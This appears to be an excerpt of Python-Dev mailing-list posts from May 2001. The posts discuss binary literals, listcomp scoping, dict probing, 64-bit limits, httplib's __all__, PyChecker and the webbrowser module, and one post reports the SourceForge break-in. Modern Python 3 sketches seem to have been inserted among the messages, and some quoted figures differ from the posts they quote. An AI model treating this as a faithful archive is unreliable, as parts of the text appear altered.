  hex(x) --> base(x, 16)
  oct(x) --> base(x, 8)
  bin(x) --> base(x, 2)

  base(x, n) checks __hex__ and __oct__ slots for special cases
             of n=16 and n=8, falls back on __base__

There, that takes care of integers. Anyone want to do the
equivalent for floats ?-)
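
The proposed literal syntax is regular enough that a reader for it is short. A sketch in Python, where the regular expression and `parse_base_literal` are hypothetical (the proposal gives only the two examples): an optional `(N)` after `0b` selects the base, and its absence means binary.

```python
import re

# Hypothetical grammar: "0b" or "0B", an optional "(N)" base, then the digits.
_BASE_LITERAL = re.compile(r"0[bB](?:\((\d+)\))?([0-9a-zA-Z]+)\Z")


def parse_base_literal(text: str) -> int:
    """Parse '0b(5)21403' (explicit base) or '0b11001101' (binary)."""
    m = _BASE_LITERAL.match(text)
    if m is None:
        raise ValueError("not a base literal: %r" % text)
    base = int(m.group(1)) if m.group(1) is not None else 2  # no "(N)": binary
    if not 2 <= base <= 36:
        raise ValueError("base must be in 2..36")
    return int(m.group(2), base)  # raises ValueError on digits invalid in this base


print(parse_base_literal("0b(5)21403"))  # 1478
print(parse_base_literal("0b11001101"))  # 205
```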

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From esr at thyrsus.com  Thu May 31 08:01:54 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 02:01:54 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200
References: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com> <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <20010531020154.A4404@thyrsus.com>

Greg Ewing <greg at cosc.canterbury.ac.nz>:
> So, just add one general one:
> 
>   %m.nb
> 
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

I had a similar idea, but your version is more elegant.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The common argument that crime is caused by poverty is a kind of
slander on the poor.
	-- H. L. Mencken


From tim_one at email.msn.com  Thu May 31 08:20:21 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:20:21 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIOKFAA.tim_one@email.msn.com>

[Greg Ewing]
> If we do this, we also need to consider whether we want
> to make the corresponding change to regular for-loops.
> Seems to me that all the reasons it's a good idea for
> listcomps apply to for-loops as well.

I expect there's no chance:  unlike listcomps, for-loops allow break
statements, and search loops that use the for index after a break (and out
of the loop!) are common.
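
A minimal sketch of the search-loop idiom meant here, plus, for contrast, the behavior Python 3 eventually adopted for comprehensions: each gets its own scope, while a for-loop still binds its variable in the enclosing scope. Function names are illustrative.

```python
def first_negative_index(values):
    for i, v in enumerate(values):
        if v < 0:
            break      # leave the loop early...
    else:
        return None    # no break happened: nothing found
    return i           # ...and keep using the loop variable afterwards


def comprehension_variable_after(values):
    v = "unchanged"
    squares = [v * v for v in values]  # in Python 3 this v is local to the comprehension
    return v, squares


print(first_negative_index([3, 1, -4, 1]))   # 2
print(comprehension_variable_after([1, 2]))  # ('unchanged', [1, 4])
```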

> Another advantage of changing both together is that
> we can continue to describe listcomp semantics in terms
> of for-loops

But I'm afraid that's also an advantage of leaving both alone.

> instead of lambdas.
>
> Then we won't have to go into hiding until Guido dies or lifts
> the fatwah against us.

Death won't stop him -- he's Dutch <wink>.


From tim_one at email.msn.com  Thu May 31 08:28:04 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:28:04 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEIPKFAA.tim_one@email.msn.com>

[Greg Ewing]
> So, just add one general one:
>
>   %m.nb
>
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

Except .n has a different meaning already for integer conversions:

>>> "%.5d" % 2
'00002'
>>> "%.10o" % 377
'0000000571'
>>>

It would be inconsistent to hijack it to mean something else here.

> Literals:
>
>   0b(5)21403       general

I've actually got no use for bases outside {2, 8, 10, 16}, and have never
heard a request for them either, so I'd be at best -0.  Better to stop
documenting the full truth about int() <0.9 wink>.

>   0b11001101       binary

+1.

> Conversion functions:
>
>   base(x, n)       general

-0, as above.

>   bin(x)           equivalent to base(x, 2) (for symmetry with
>                                              existing hex, oct)

+1 if binary literals are added.

> Type slots:
>
>   __base__(x, n)

Given the tenor of the above, add __bin__ and call it a day.

> Backwards compatibility measures:
>
>   hex(x) --> base(x, 16)
>   oct(x) --> base(x, 8)
>   bin(x) --> base(x, 2)
>
>   base(x, n) checks __hex__ and __oct__ slots for special cases
>              of n=16 and n=8, falls back on __base__
>
> There, that takes care of integers. Anyone want to do the
> equivalent for floats ?-)

Note that C99 introduces a hex notation for floats.
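
Later Python releases added `float.hex()` and `float.fromhex()` for this C99 notation. A short sketch of why it is useful: the hex form states a double's bits exactly, so it round-trips with no decimal rounding.

```python
x = 0.1
text = x.hex()                    # '0x1.999999999999ap-4'
assert float.fromhex(text) == x   # exact round trip
print(text)
print(float.fromhex("0x1.8p+1"))  # 3.0, i.e. 1.5 * 2**1
```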


From mal at lemburg.com  Thu May 31 09:20:11 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:20:11 +0200
Subject: [Python-Dev] SF hacked
References: <20010531035248.G690@xs4all.nl>
Message-ID: <3B15F0AB.34F2F664@lemburg.com>

Thomas Wouters wrote:
> 
> It *seems*, from this site:
> 
> http://66.92.75.28/~vladimir/themes-org.html
> 
> that SourceForge has been hacked, and more seriously than SF first admits
> (if I'm to believe the arrogant spouting of some script-kiddie, anyway. :)
> And the same goes for apache.org, it looks like. Anyway, if anyone connected
> *from* any of sourceforge's machines to anywhere else, in the last couple of
> months, they'll be well advised to change their passwords and check for
> intruders. The same goes if you connect through ssh and (foolishly ;)
> allowed ssh-agent-forwarding to the SF machines. In that case, better check
> all the machines that ssh-agent would give you unpassworded access to for
> logins you don't recognize. The site above lists a number of sniffed
> passwords, in case you want to check, but there's no reason for the hacker
> not to have even more sniffed passwords lying about :)
> 
> And if you have a login on apache.org, you probably want to change your
> password in any case.... the above listed site has what seems to be a copy
> of the shadow password file.

FYI, the file's contents are no longer available it seems. Still,
SF seems to be alarmed about this:

*****************************************************************************
                I M P O R T A N T   P L E A S E     R E A D
*****************************************************************************

        If you are seeing this it's because we've failed over from
        pr-shell1.

        This is a failover server only.  As soon as pr-shell1 is better we
        will cut back to it.  So please do not start any daemon process
        that you care about.

                                                - The SF Staff


About the password change: this doesn't seem to be possible on
the failover machine (I get a permission denied message).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Thu May 31 09:33:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:33:36 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>
Message-ID: <3B15F3D0.AD646102@lemburg.com>

Tim Peters wrote:
> 
> If anyone has an app known or suspected to be sensitive to dict timing,
> please try the patch here.  Best I've been able to tell, it's a win.  But
> it's a radical change in approach, so I don't want to rush it.
> 
> This gets rid of the polynomial machinery entirely, along with the branches
> associated with updating the things, and the dictobject struct member
> holding the table's poly.  Instead it relies on that
> 
>     i = (5*i + 1) % n
> 
> is a full-period RNG whenever n is a power of 2 (that's what guarantees it
> will visit every slot), but perturbs that by adding in a few bits from the
> full hash code shifted right each time (that's what guarantees every bit of
> the hash code eventually influences the probe sequence, avoiding simple
> quadratic-time degenerate cases).

Cool idea... rips out all that algebra garble and replaces it with 
random beauty :-)

In any case, this will avoid us the trouble of having to check
those poly numbers every time Intel decides to bump the register
width by another factor of two ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Thu May 31 10:43:32 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 04:43:32 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com>
Message-ID: <20010531044332.B5026@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> In any case, this will avoid us the trouble of having to check
> those poly numbers every time Intel decides to bump the register
> width by another factor of two ;-)

This seems unlikely.  

2^64 = 18446744073709551616, which is roughly 1.8 x 10^19.  Let's assume 
a memory density of, say, 2^20 machine words or roughly 8 megabytes per 
cubic centimeter (much, *much* better than we'll be able to do for the 
foreseeable future -- remember power distribution and heat dissipation).
Then, approximating the cubic relation between a sphere's volume and area 
by lopping off a power of four, we see that 2^64 64-bit words of memory 
would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 
17 million kilometers.  

This is roughly twice the diameter of the Sun.  64-bit computers
aren't going to run out of address space any time soon.

64-bit clocks counting seconds will turn over in approximately 585
billion years, long after the expansion of the Universe will have
dropped its energy density low enough to make computation...well, 
let's just say "difficult" and leave it at that.

Nobody needs 128 bits of integer or floating-point precision, either.
There's basically no source of data to compute with that's got
anywhere near 22 significant digits of accuracy -- 48 bits is
about the most people in scientific computing ever use.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

[President Clinton] boasts about 186,000 people denied firearms under
the Brady Law rules.  The Brady Law has been in force for three years.  In
that time, they have prosecuted seven people and put three of them in
prison.  You know, the President has entertained more felons than that at
fundraising coffees in the White House, for Pete's sake."
	-- Charlton Heston, FOX News Sunday, 18 May 1997


From mal at lemburg.com  Thu May 31 11:23:52 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 11:23:52 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <3B160DA8.B9FF9AC2@lemburg.com>

"Eric S. Raymond" wrote:
> 
> M.-A. Lemburg <mal at lemburg.com>:
> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)
> 
> This seems unlikely.
> 
> 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> a memory density of, say, 2^20 machine words or roughly 8 megabytes per
> cubic centimeter (much, *much* better than we'll be able to do for the
> foreseeable future -- remember power distribution and heat dissipation).

Where did you get those numbers from ? There are memory sticks
with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

> Then, approximating the cubic relation between a sphere's volume and area
> by lopping off a power of four, we see that 2^64 64-bit words of memory
> would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about
> 17 million kilometers.
> 
> This is roughly twice the diameter of the Sun.  64-bit computers
> aren't going to run out of address space any time soon.
> 
> 64-bit clocks counting seconds will turn over in approximately six
> trillion years, long after the expansion of the Universe will have
> dropped its energy density low enough to make computation...well,
> let's just say "difficult" and leave it at that.
> 
> Nobody needs 128 bits of integer or floating-point precision, either.
> There's basically no source of data to compute with that's got
> anywhere near 22 significant digits of accuracy -- 48 bits is
> about the most people in scientific computing ever use.

Just you wait... someday marketing people will probably invent the
world memory facility and start assigning a few hundred
Terabytes for everyone on this planet to use for his/her data 
storage -- store once, use everywhere ;-)

Let's assume we have 12e9 people on this planet by that time, then
we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
roughly 2^80 bytes per civilization.

Of course, they will want to run Python in order to manage
that data and so will all those Palm users hooking up to the
facility... ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Thu May 31 12:31:07 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 06:31:07 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com>
Message-ID: <20010531063107.B5510@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> > 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> > a memory density of, say, 2^20 machine words or roughly 8 megabytes per
> > cubic centimeter (much, *much* better than we'll be able to do for the
> > foreseeable future -- remember power distribution and heat dissipation).
> 
> Where did you get those numbers from ? There are memory sticks
> with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

Remember power distribution and heat dissipation.  You can't just figure the
volume of the memory ICs; you have to include power and cooling and structural
support too.  I eyeballed some DRAM modules I had lying around.

In any case, my figures aren't that sensitive to memory density.  If
I'm off by a factor of 64, the diameter of the memory sphere only drops
by a factor of four (it's that cube-root relationship between volume
and radius).  So it's only half the radius of the Sun.  That's still
way, *way* more mass than all the planets in the Solar System put
together.

> Just you wait... someday marketing people will probably invent the
> world memory facility and start assigning a few hundred
> Terabytes for everyone on this planet to use for his/her data 
> storage -- store once, use everywhere ;-)
> 
> Let's assume we have 12e9 people on this planet by that time, then
> we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
> roughly 2^80 bytes per civilization.

Nah.  Individual storage requirements would never get that large.
Bill Joy did a study on this once and figured out that human beings
can generate about 14GB of text during their lifetimes, max.  In a
system like the Web-on-steroids one you're supposing, higher-volume
stuff like streaming video or Linux-kernel archives would be stored
*once* with URLs pointing at them from people's individual stores.

One terabyte (2^40) per person leaves plenty of headroom (two orders
of magnitude larger).  We could still handle a world population of
2^24 or roughly 16 billion people.  (I think the size of the Library
of Congress has been estimated at several thousand terabytes.)
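Both storage estimates are simple powers-of-two arithmetic. The sketch below reproduces Marc-Andre's central-storage total and the per-person split of a 64-bit address space described in the reply; treating that address space as byte-addressed is an assumption made for the sketch.

```python
import math

# Figures from the exchange above; both are the posters' assumptions.
PEOPLE = 12e9                # projected world population
BYTES_PER_PERSON = 100e12    # the 100e12 used in the estimate
total_bytes = PEOPLE * BYTES_PER_PERSON
total_log2 = math.log2(total_bytes)

# One binary terabyte (2**40 bytes) per person inside a byte-addressed
# 64-bit address space (byte addressing is our assumption).
people_per_address_space = 2 ** 64 // 2 ** 40

print(f"central storage: {total_bytes:.2e} bytes, about 2**{total_log2:.2f}")
print(f"2**64 / 2**40 = {people_per_address_space:,} "
      f"= 2**{people_per_address_space.bit_length() - 1}")
```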
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

I don't like the idea that the police department seems bent on keeping
a pool of unarmed victims available for the predations of the criminal
class.
         -- David Mohler, 1989, on being denied a carry permit in NYC


From thomas at xs4all.net  Thu May 31 12:45:33 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 12:45:33 +0200
Subject: [Python-Dev] One more dict trick
In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <20010531124533.J690@xs4all.nl>

On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote:
> M.-A. Lemburg <mal at lemburg.com>:

> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)

> This seems unlikely.  

Why ? Bumping register size doesn't mean Intel expects to use it all as
address space. They could be used for video-processing, or to represent a
modest range of rationals <wink>, or to help core 'net routers deal with
those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger
registers as well.

Oh wait... I get it! You were trying to get yourself in the history books as
the guy that said "64 bits ought to be enough for everyone" :-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From neal at metaslash.com  Wed May 30 04:49:45 2001
From: neal at metaslash.com (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <mailman.991257181.1069.clpa-moderators@python.org>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in Python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of Python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
"Variable unused" warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks to everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on SourceForge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker at metaslash.com


From beazley at cs.uchicago.edu  Thu May 31 15:34:57 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Thu, 31 May 2001 08:34:57 -0500 (CDT)
Subject: [Python-Dev] RE: Iteration variables and list comprehensions
In-Reply-To: <E155KrW-00029v-00@mail.python.org>
References: <E155KrW-00029v-00@mail.python.org>
Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu>

Greg Ewing writes: 
 > Another advantage of changing both together is that
 > we can continue to describe listcomp semantics in terms
 > of for-loops instead of lambdas.

Is this really an advantage?  To me, the lambda semantics are a lot
more intuitive in terms of matching the way that list comprehensions
are actually used and ought to work (although I will agree that the
for-loop explanation is a good way to describe the internals of what a
list comprehension actually does).

I think I would be opposed to changing normal for-loop semantics to
match any change made in list-comprehensions. There are too many cases
where you use a loop variable after finishing a loop and I suspect
that this would break a huge amount of code. For example:

    for i in r:
        ...
        if whatever: break

    print i

Besides, the semantic mismatch created between a listcomp and a
for-loop pales in comparison to the mismatch that currently exists
between the behavior of listcomps and all of the other operators.  Of
course, that's just my opinion--I could be wrong.
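The idiom under discussion is easy to demonstrate. The sketch below (function names are illustrative) shows a for-loop variable still bound after `break`, and probes whether a list comprehension's variable survives the comprehension. It targets modern Python 3, where, unlike the Python 2.1 discussed in this thread, comprehension variables no longer leak into the enclosing scope, while for-loop semantics were left unchanged.

```python
def index_of(items, target):
    """Find target by scanning with a for-loop, then use the loop variable
    after the loop has ended (assumes items is non-empty)."""
    for i in range(len(items)):
        if items[i] == target:
            break
    # The loop variable is still bound after `break` (or after the loop
    # runs to completion), in Python 2 and Python 3 alike.
    return i


def comprehension_variable_visible():
    """Return True if a list comprehension's variable is visible afterwards."""
    squares = [comp_var * comp_var for comp_var in range(3)]
    try:
        comp_var  # probe for a leaked binding; NameError if there is none
    except NameError:
        return False
    return True


print(index_of(["a", "b", "c"], "b"))
print(comprehension_variable_visible())
```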

 > Then we won't have to go 
 > into hiding until Guido dies or lifts the fatwah against us.

fatwah?  Uh...  should I start talking to the witness protection
program folks?

Cheers,

Dave


From skip at pobox.com  Thu May 31 20:02:51 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:02:51 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
Message-ID: <15126.34635.67975.31473@beluga.mojam.com>

>>>>> "Robin" == Robin Becker <robin at jessikat.fsnet.co.uk> writes:

    Robin> from httplib import *

    Robin> class Bongo(HTTPConnection):
    Robin>         pass
    ...
    Robin> NameError: name 'HTTPConnection' is not defined

It was a brain fart on my part when creating httplib.__all__.
HTTPConnection was not included in that list.  I will check in a fix.
In the 2.1 release __all__ was defined as 

    __all__ = ["HTTP"]

I have changed that to

    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
	       "HTTPException", "NotConnected", "UnknownProtocol",
	       "UnknownTransferEncoding", "IllegalKeywordArgument",
	       "UnimplementedFileMode", "IncompleteRead",
	       "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
	       "ResponseNotReady", "BadStatusLine", "error"]

and will check the change into CVS shortly. (Thomas, keep an eye open for
this as an addition to 2.1.1.)
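The effect of __all__ on a star-import can be reproduced without touching httplib itself. In the sketch below, `fake_httplib` and `star_import_names` are hypothetical names: the helper builds a throwaway module in memory, registers it in `sys.modules`, and reports which names `from ... import *` binds, first with the one-entry __all__ and then with HTTPConnection added.

```python
import sys
import types


def star_import_names(module_name, source):
    """Build a throwaway module from `source` and return the names that
    `from <module_name> import *` binds in a fresh namespace."""
    module = types.ModuleType(module_name)
    exec(source, module.__dict__)
    sys.modules[module_name] = module
    try:
        namespace = {}
        exec(f"from {module_name} import *", namespace)
        namespace.pop("__builtins__", None)  # added by exec(), not imported
        return sorted(namespace)
    finally:
        del sys.modules[module_name]


# A cut-down, hypothetical stand-in for httplib as released in 2.1.
RELEASED = '''
__all__ = ["HTTP"]
class HTTP: pass
class HTTPConnection: pass
'''
FIXED = RELEASED.replace('["HTTP"]', '["HTTP", "HTTPConnection"]')

print(star_import_names("fake_httplib", RELEASED))
print(star_import_names("fake_httplib", FIXED))
```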

The workaround I would choose is not to use "from httplib import *":

    import httplib

    class Bongo(httplib.HTTPConnection):
        pass

    Robin> Changing the * to HTTPConnection in ttt.py removes the problem.

Yup, that will also work.

Before anyone asks, "Who died and made Skip King?", the scenario as I recall
it was that the semantics of __all__ got settled on during discussions on
python-dev (the goal of __all__ being to minimize namespace pollution by
"from ... *"), but nobody stepped up immediately to do the grunt work, so I
volunteered.  The problem in relying on one person (well, at least this one
person) to do this was that I had only the following tools at my disposal to
decide what belonged in __all__:

    * what was documented in the lib reference manual (which was at times
      incomplete)
    * my experience with the various modules (some of which was specialized,
      some of which was nonexistent)
    * the standard library (which generally doesn't use "from ... *" much)
    * input from python-dev (whose members also appear not to use "from
      ... *" very liberally)

In retrospect, I probably should have polled c.l.py with a summary of what I
came up with before the 2.1 ship date.  If people would like me to do that
now (before 2.2 gets anywhere close to release) to try and fill in as many
missing symbols as possible, let me know.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098


From skip at pobox.com  Thu May 31 20:06:01 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:06:01 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
Message-ID: <15126.34825.167026.520535@beluga.mojam.com>

I just updated httplib.py to expand the list of names in its __all__ list.
I was operating on version 1.34.  After the checkin I am looking at version
1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
"release21-maint".  Did I muff it?  If so, how should I do an unmuff
operation?

Skip


From robin at jessikat.fsnet.co.uk  Thu May 31 20:33:02 2001
From: robin at jessikat.fsnet.co.uk (Robin Becker)
Date: Thu, 31 May 2001 19:33:02 +0100
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
 <15126.34635.67975.31473@beluga.mojam.com>
Message-ID: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>

In message <15126.34635.67975.31473 at beluga.mojam.com>, Skip Montanaro
<skip at pobox.com> writes
>>>>>> "Robin" == Robin Becker <robin at jessikat.fsnet.co.uk> writes:
>
>    Robin> from httplib import *
>
>    Robin> class Bongo(HTTPConnection):
>    Robin>         pass
>    ...
>    Robin> NameError: name 'HTTPConnection' is not defined
>
>It was a brain fart on my part when creating httplib.__all__.
>HTTPConnection was not included in that list.  I will check in a fix.
>In the 2.1 release __all__ was defined as 
>
>    __all__ = ["HTTP"]
>
>I have changed that to
>
>    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
>              "HTTPException", "NotConnected", "UnknownProtocol",
>              "UnknownTransferEncoding", "IllegalKeywordArgument",
>              "UnimplementedFileMode", "IncompleteRead",
>              "ImproperConnectionState", "CannotSendRequest", 
>"CannotSendHeader",
>              "ResponseNotReady", "BadStatusLine", "error"]

thanks; I'm still a bit puzzled as to the exact semantics. It just looks
wrong. Is __all__ the only way to get things into the * version of
import? Presumably HTTPConnection is being marked as a potential global
in the compile phase.
-- 
Robin Becker


From skip at pobox.com  Thu May 31 21:27:12 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:27:12 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
	<15126.34635.67975.31473@beluga.mojam.com>
	<s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
Message-ID: <15126.39696.370516.926735@beluga.mojam.com>

    Robin> thanks; I'm still a bit puzzled as to the exact semantics. It
    Robin> just looks wrong. Is __all__ the only way to get things into the
    Robin> * version of import?

Essentially, yes.  If you want to just dispense with it __all__together
(=:-o), you can textually replace __all__ with ___all__ in each of the
standard library modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
	sed -e 's/___*all__/___all__/g' < $f > $f.tmp
	mv $f.tmp $f
    done

Note that I didn't touch any files in directories under the basic Lib
directory.

    Robin> Presumably HTTPConnection is being marked as a potential global
    Robin> in the compile phase.

It has nothing to do with module compilation.  The contents of __all__ are a
static thing in the text of the .py file, and thus far almost entirely due to
me studying the inputs at hand and making a decision about what belonged and
what didn't.  Some python-dev people caught omissions and added them before
the 2.1 release.  Other than that, the mistakes are all mine.
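When a module defines no __all__, `from module import *` falls back to every name in the module's namespace that does not start with an underscore, which is how modules it merely imported (such as `os`) end up in the importer's namespace. The sketch below shows that fallback with a hypothetical in-memory module named `no_all_demo`.

```python
import sys
import types

# Hypothetical module with no __all__: everything without a leading
# underscore is exported, including the modules it imported.
SOURCE = '''
import os
CONSTANT = 1
def public(): pass
def _private(): pass
'''

module = types.ModuleType("no_all_demo")
exec(SOURCE, module.__dict__)
sys.modules["no_all_demo"] = module
try:
    namespace = {}
    exec("from no_all_demo import *", namespace)
finally:
    del sys.modules["no_all_demo"]

# Drop the __builtins__ entry that exec() itself adds to the namespace.
imported = sorted(name for name in namespace if name != "__builtins__")
print(imported)
```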

I had some misgivings about the whole thing during the midst of the task and
still do, but grumbled once and completed it.

Skip


From skip at pobox.com  Thu May 31 21:57:21 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:57:21 -0500
Subject: [Python-Dev] weird webbrowser behavior
Message-ID: <15126.41505.987887.477670@beluga.mojam.com>

I'm using Gnome under Mandrake 8.0 and getting very strange results using
webbrowser (indirectly via pydoc).  Apparently, Gnome's init code sets the
BROWSER environment variable to "nautilus" (much to my surprise) and
webbrowser trusts it as the god's honest truth, even though nautilus has not
been registered with the webbrowser module (am I supposed to add that sort
of stuff to site.py?).  Accordingly, _tryorder is ['nautilus'], but 'nautilus'
doesn't appear in _browsers.keys(), which is ['lynx', 'links', 'netscape',
'kfm', 'mozilla'].  I think webbrowser should either ignore elements of BROWSER if
they have not previously been registered (and can't be found by _iscommand)
or try to register them using GenericBrowser.  Users are apparently not the
only people setting BROWSER, so the comment in the code:

    # It's the user's responsibility to register handlers for any unknown
    # browser referenced by this value, before calling open().

seems like flawed logic to me.
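Combining both of the suggestions above (keep registered entries, register unknown ones only if they can actually be found, drop the rest) might look roughly like the sketch below. `browsers_to_try` is a hypothetical helper, not part of webbrowser; `shutil.which` (Python 3.3 and later) stands in for the module's private `_iscommand` check, and the `which` parameter exists only so the PATH lookup can be faked.

```python
import os
import shutil


def browsers_to_try(browser_env, registered, which=shutil.which):
    """Hypothetical helper: decide how to treat each entry of a BROWSER value.

    Entries are separated by os.pathsep. Registered names are kept as-is;
    unregistered names that `which` can find on PATH are kept and also
    returned in `to_register`; anything else is dropped instead of being
    trusted blindly.
    """
    try_order, to_register = [], []
    for name in browser_env.split(os.pathsep):
        if not name:
            continue
        if name in registered:
            try_order.append(name)
        elif which(name):
            try_order.append(name)
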